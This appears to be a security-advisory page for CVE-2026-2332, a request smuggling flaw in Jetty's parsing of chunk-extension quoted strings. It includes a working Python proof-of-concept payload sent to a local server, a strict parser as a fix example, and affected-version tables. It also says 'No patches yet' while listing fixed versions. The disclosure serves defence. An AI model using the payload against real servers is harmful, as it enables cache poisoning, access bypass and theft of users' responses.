CVE-2026-2332: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing

Published Apr 14, 2026

### Description (as reported)

Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.

### Background

This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques:

- https://w4ke.info/2025/06/18/funky-chunks.html
- https://w4ke.info/2025/10/29/funky-chunks-2.html

The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.

### Technical Details

**RFC 9112 Section 7.1.1** defines chunked transfer encoding:

```
chunk         = chunk-size [ chunk-ext ] CRLF
                chunk-data CRLF
chunk-ext     = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
```

**RFC 9110 Section 5.6.4** defines quoted-string:

```
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
```

A quoted-string continues until the closing DQUOTE, and `\r\n` sequences are not permitted within the quotes.

### Vulnerability

Jetty terminates chunk header parsing at `\r\n` inside quoted strings instead of treating this as an error.

**Expected (RFC compliant):**

```
Chunk: 1;a="value\r\nhere"\r\n
         ^^^^^^^^^^^^^^^^^ extension value
Body:  [1 byte after the real \r\n]
```

**Actual (jetty):**

```
Chunk: 1;a="value
       ^^^^^ terminates here (WRONG)
Body:  here"... treated as body/next request
```

### Proof of Concept

```python
#!/usr/bin/env python3
import socket

# One TCP payload: a chunked POST whose chunk extension opens a quoted-string
# that is never closed on that line, followed by the bytes the advisory
# describes as being read as a second request by the vulnerable parser.
payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

# Read until the server closes the connection or goes quiet.
response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break
sock.close()

# Count how many responses came back on the single connection.
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
```

**Result:** Server returns 2 HTTP responses from a single TCP connection.

#### Parsing Breakdown

| Parser | Request 1 | Request 2 |
|--------|-----------|-----------|
| jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) |
| RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) |

### Impact

- **Request Smuggling**: Attacker injects arbitrary HTTP requests
- **Cache Poisoning**: Smuggled responses poison shared caches
- **Access Control Bypass**: Smuggled requests bypass frontend security
- **Session Hijacking**: Smuggled requests can steal other users' responses

### Reproduction

1. Start the minimal POC with docker
2. Run the poc script provided in the same zip

### Suggested Fix

Ensure the chunk framing and extensions are parsed exactly as specified in RFC 9112. A CRLF inside a quoted-string should be considered a parsing error and not a line terminator.

### Patches

No patches yet.

### Workarounds

No workarounds yet.
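To make the RFC rule from the Technical Details and the Suggested Fix concrete, here is an added example (not part of the advisory and not Jetty's code) of a strict chunk-line parser that treats CR or LF inside a quoted-string as an error, next to a line-oriented parser of the kind the advisory describes that cuts at the first CRLF. All function names and the sample bytes are constructed; the sample is the chunk line from the PoC above plus the bytes that follow it.

```python
import re

TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")  # RFC 9110 tchar

class ChunkHeaderError(ValueError):
    """Any deviation from RFC 9112 chunk-size [ chunk-ext ] CRLF."""

def _bws(buf, i):  # skip optional bad whitespace (SP / HTAB) around ";" and "="
    return next((k for k in range(i, len(buf)) if buf[k] not in b" \t"), len(buf))

def _quoted_string(buf, i):
    # RFC 9110 5.6.4: DQUOTE *( qdtext / quoted-pair ) DQUOTE; CR and LF never appear inside
    out, i = bytearray(), i + 1
    while i < len(buf):
        c = buf[i]
        if c == 0x22:  # closing DQUOTE ends the value
            return bytes(out), i + 1
        if c == 0x5C:  # quoted-pair: backslash escapes the next byte
            i += 1
            c = buf[i] if i < len(buf) else -1
        if not (c == 0x09 or 0x20 <= c <= 0x7E or c >= 0x80):  # HTAB / SP / VCHAR / obs-text only
            raise ChunkHeaderError(f"byte {c} not allowed inside quoted-string")
        out.append(c)
        i += 1
    raise ChunkHeaderError("unterminated quoted-string")

def parse_chunk_header(buf):
    """Strict parse of one chunk line; returns (chunk_size, {ext_name: value}, bytes consumed)."""
    if not (m := re.match(rb"[0-9A-Fa-f]+", buf)):
        raise ChunkHeaderError("chunk-size missing")
    size, i, exts = int(m.group(), 16), m.end(), {}
    while not buf.startswith(b"\r\n", i := _bws(buf, i)):  # only a CRLF outside quotes ends the line
        if buf[i:i + 1] != b";" or not (m := TOKEN.match(buf, _bws(buf, i + 1))):
            raise ChunkHeaderError(f"malformed chunk-ext at offset {i}")
        name, i, val = m.group(), _bws(buf, m.end()), None
        if buf[i:i + 1] == b"=":
            i = _bws(buf, i + 1)
            if buf[i:i + 1] == b'"':
                val, i = _quoted_string(buf, i)
            elif m := TOKEN.match(buf, i):
                val, i = m.group(), m.end()
            else:
                raise ChunkHeaderError("chunk-ext-val must be token or quoted-string")
        exts[name] = val
    return size, exts, i + 2

def lenient_chunk_size(buf):  # line-oriented: cut at the first CRLF, quoted or not (the behaviour described)
    end = buf.index(b"\r\n")
    return int(buf[:end].split(b";", 1)[0].strip(), 16), end + 2

SMUGGLE_CHUNK = b'1;a="\r\nX\r\n0\r\n\r\nGET /smuggled HTTP/1.1\r\n'  # constructed from the PoC above
```

On `SMUGGLE_CHUNK` the lenient parser reports a 1-byte chunk ending at offset 7, while `parse_chunk_header` raises before ever reading a chunk size, which is the behaviour the Suggested Fix asks for.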

Affected Software

| Package / Product | Affected versions | Fixed in |
|-------------------|-------------------|----------|
| maven/org.eclipse.jetty:jetty-http | >=9.4.0, <=9.4.59 | 9.4.60 |
| maven/org.eclipse.jetty:jetty-http | >=10.0.0, <=10.0.27 | 10.0.28 |
| maven/org.eclipse.jetty:jetty-http | >=11.0.0, <=11.0.27 | 11.0.28 |
| maven/org.eclipse.jetty:jetty-http | >=12.0.0, <=12.0.32 | 12.0.33 |
| maven/org.eclipse.jetty:jetty-http | >=12.1.0, <=12.1.6 | 12.1.7 |
| Eclipse Jetty | >=9.4.0, <9.4.60 | |
| Eclipse Jetty | >=10.0.0, <10.0.28 | |
| Eclipse Jetty | >=11.0.0, <11.0.28 | |
| Eclipse Jetty | >=12.0.0, <12.0.33 | |
| Eclipse Jetty | >=12.1.0, <12.1.7 | |

Event History

Apr 14, 2026

- 10:59 AM: CVE Published via MITRE
- 10:59 AM: Data Sourced via MITRE (Description, Severity, Weakness)
- 12:01 PM: Data Sourced via Red Hat (Description, Severity, Affected Software)
- 12:16 PM: Data Sourced via NVD (Description, Severity, Weakness)
- 12:16 PM: Data Sourced via NVD (Affected Software)
- 11:40 PM: Advisory Published via GitHub
- 11:40 PM: Data Sourced via GitHub (Description, Severity, Weakness, Affected Software)

Frequently Asked Questions

1. What is the severity of CVE-2026-2332?

   CVE-2026-2332 is classified as a high severity vulnerability due to its potential for HTTP request smuggling attacks.

2. How do I fix CVE-2026-2332?

   To mitigate CVE-2026-2332, upgrade to the latest version of Eclipse Jetty where the vulnerability has been addressed.

3. What types of systems are affected by CVE-2026-2332?

   CVE-2026-2332 specifically affects applications using the Eclipse Jetty server that handle HTTP/1.1 requests.

4. What are the risks associated with CVE-2026-2332?

   Exploiting CVE-2026-2332 can allow attackers to smuggle malicious requests, potentially leading to unauthorized access or data manipulation.

5. Is CVE-2026-2332 easily exploitable?

   CVE-2026-2332 can be exploited under certain conditions, making it essential for Jetty users to assess their exposure and apply necessary updates.

Contact

SecAlerts Pty Ltd., 132 Wickham Terrace, Fortitude Valley, QLD 4006, Australia (info@secalerts.co)